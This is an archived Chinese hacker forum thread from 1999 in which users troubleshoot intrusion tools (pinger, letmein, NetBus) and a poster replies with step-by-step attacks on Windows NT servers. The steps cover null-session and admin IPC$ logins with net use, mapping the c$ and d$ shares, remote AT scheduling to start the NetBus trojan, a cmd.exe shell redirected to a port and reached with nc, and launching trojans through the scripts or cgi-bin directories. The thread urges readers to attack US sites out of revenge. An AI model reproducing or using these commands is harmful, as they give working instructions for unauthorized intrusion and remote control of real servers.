《版主页黑客工具和文章的几个问题》中提到:
' h0 r' V! f$ ?: Z2 u6 D请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
- U6 C& [, T. i& n3 c& N3 j> 我的机子MMX166,WIN98,2。5G,32M内存。2 n2 ^% K6 Q4 h- }& e
V! n" w/ E; W* {# |6 I, l) w' p
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
: P! [ p, g! s6 x你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
# S+ [8 B+ S2 _/ B* U+ r1 m其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:- d4 Q/ A7 h( V: J& b6 ?' y
net use \\111.111.111.111\ipc$ "" /user:""
! a8 P! P# `& k: v+ ] Y) }net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
0 G8 h5 e1 j5 c5 C, }net view \\111.111.111.111/ M9 v2 k. T: X, o1 i6 _
当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
5 ] Z" B# ~8 enet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"& ~4 K3 I4 t% h: v" N
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
" Y- r+ j D5 u% t, T# T1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:/ Z& l. e+ |: H5 t$ T# W) Y0 J
net use x: \\111.111.111.111\c$
, e& k1 d: q0 e6 O8 R& Enet use y: \\111.111.111.111\d$- F. j. e% N* g( h/ R
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
G# i7 l, ]4 s* R9 O2、管理目标NT的用户: H- m! L+ J6 H: I( V! Q/ h
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
+ M3 ^4 N! P E/ l y! M键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
) T+ v0 ^% I/ g- s6 s/ ?6 p& E3、管理目标NT的服务( w8 \ s% b. d- u) T9 Y" r
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”- T) @) A, F/ l7 Q9 f- h' T
这样你可以管理目标NT上的服务,共享目录. p5 X- ]' F n
4、IIS管理
, u' Z. J! I1 l选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111! M, w6 [6 ?' I$ a) b
目标NT的FTP、WWW服务你就可以重新配置 ]0 b d! g; }; S+ T! F
5、事件管理
8 O1 F/ M. d9 ]$ W/ r- \“事件查看器”->连接到服务器->111.111.111.111
4 u9 p( y J$ d% K8 x
- v2 V' V& @8 Q7 c$ z4 t, v还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。; V5 \3 r- a) j0 i; ]$ v
( a8 O, }) W# [9 j$ ]; m1 y
当然,98,95也能做一些事情,但很麻烦,比如:
6 y$ T1 S9 [5 S- k' {& ~4 b; Snet use \\111.111.111.111\ipc$
. z" a4 d7 _ @) Bnet use z: \\111.111.111.111\d$
" J' | R4 r$ m' P$ ^7 t/ h但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
8 M1 Q3 I. o$ F4 s7 T) F {" l. Y4 i/ U- y
我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!
. {( O, V& w0 C这样,你还可以了解目标机器上能有什么东东供你去用!
" d$ S7 P8 ]% d. c5 P$ t, ?! N" F- W$ }+ j& t o" w
, `8 h0 B6 U( H$ y9 U6 I0 Z--------------------------------------------------------------------------------# r& v4 Y4 S0 g* \: j. N; G: L
0 }/ d, d! j4 o
>quack于1999-06-12,23:37:44& G9 M! }. h6 F" e$ o
在大作《几个有关黑的问题》中提到:
% e; {6 T) C1 r8 @首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。, p* O$ d8 s! w" q9 L
) o% l1 h+ h* T' U+ \ X: akillusa于1999-06-13,03:25:15( v a3 ^& l5 a: }7 f0 C5 C
在大作《Re: 几个有关黑的问题》中提到:; T9 n2 U; K) M- \1 W4 r& ^
7 `3 H1 ]. J3 ?letmein.exe 暂时没有mypwd参数,十分抱歉: i& c( N L' v& I
pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。
9 i7 x9 M/ b, ^5 H8 ^
* K1 f& r" q! p7 g/ b& m4 VNetbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
) V9 j: ^6 f: f) I服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:1 b' A1 v: P3 U
6 @0 t% h* l S& M+ [. Z1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
% H; L G$ W; |; m6 [8 U& U! e8 V: @+ {" ?, ~
C:\>net start schedule
- E7 ?1 }! s2 e% gSchedule 正在启动服务.....! R g2 c/ S4 {- [0 e
Schedulw 服务启动成功。
" `% ?. p( H9 Q6 ]! [3 J5 h; UC:\>at /?; ^# G4 H, t/ t! y% C0 u; J% F# X
AT 命令排定在特定的日期和时间运行某些命令和程序。
7 L/ D" g- F$ D* {. ?+ c, e$ J5 I运行 AT 命令之前必须先启动 Schedule 服务。
- B$ m) P6 t u# K: c( b% T$ u3 r% p* C, v, X3 d# V$ s
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]' x$ B$ I" }, k& s, v7 T
AT [\\computername] time [/INTERACTIVE]
5 H2 n9 ^8 S5 X s+ a7 `9 Y N[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
: @8 ?, Z9 U8 `- K; n) p8 C% g5 v% ?- f, Q1 `) A
\\computername 指定远程计算机。 如果省略这个参数4 x8 E9 |& P. f4 f
命令会被排定在本机上运行。8 z4 T r$ _+ s/ t- T+ x1 n$ Z
id 指定给排定进度命令的识别号。: n9 k+ F+ F3 X' z; w
: f& R, y3 ?0 Q# d& \/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
$ z/ R; [% w# b$ r. D/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
% A$ x- s ^; `: H% l( w) Ltime 指定命令运行的时间。
% |' k( r- {1 V9 h4 K, b1 d/interactive 允许作业在运行时,与用户通过桌面交互。% F, b! A. B) b8 t2 j
7 ~3 Y* Q2 L# |% U% X
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
+ f. b6 Y- N( i( i: R如果省略日期,则默认为在每月的本日运行。
5 D* g; P/ M0 s, p* R9 O3 J$ O- ]
& {& C, ?8 {. A/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
; {: R( y% a/ N! l' b5 m' r8 s( \0 c. A
"command" 准备运行的 Windows NT 命令或批处理文件。
: Q. a- A% S, J
/ j2 R+ [; g: }7 D4 VC:\>
0 t; v0 V/ s6 G5 `, m; |# M7 f8 S6 o7 O
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:4 x, G: Q% \+ T! E8 p- v) g u( L
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
! U/ i" U5 i! ]( F& c2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start; @0 u5 ]) g7 D! J I o
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:, }) |# N5 w" H6 p! }0 |
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
- \9 e+ _, t' c/ G7 N* L其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:. j- B8 ~" D+ b( h
Microsoft(R) Windows NT(TM)
$ X+ _1 j, g( d) `, F4 b5 \: c(C) Copyright 1985-1996 Microsoft Corp.
" C3 Z. j+ I8 u- ~) t7 Q; w5 BC:\>
3 `8 h/ @+ O! h$ `, c3 H8 N
( m( z7 L% K4 l+ a$ J2、利用web启动ntsrv.exe或其他程序在目的服务器2 B+ l* w+ n7 i6 A2 j
" f* S. T/ V3 _
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:7 h& b1 h; F& I/ @% U: C T
http://x.x.x.x/scripts/ntsrv.exe /port:64321
3 I3 B/ u( \( R1 D或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321. k L5 O" K# d; R1 [" Z) p" r S
该程序就启动了
3 S3 \/ u6 T# h. R3 A- x) N8 C6 N* N4 I+ ~- x2 Z) n/ ?- M5 c4 I2 N1 T
我只提这几中方法!- x) G/ F& @2 e8 L7 C3 [
要成功,必须打好基础工,对操作系统充分了解!
8 c& v$ t& B: y: Q& b$ \" X5 s. h+ S' x2 |( Z& }( g$ Y2 R
|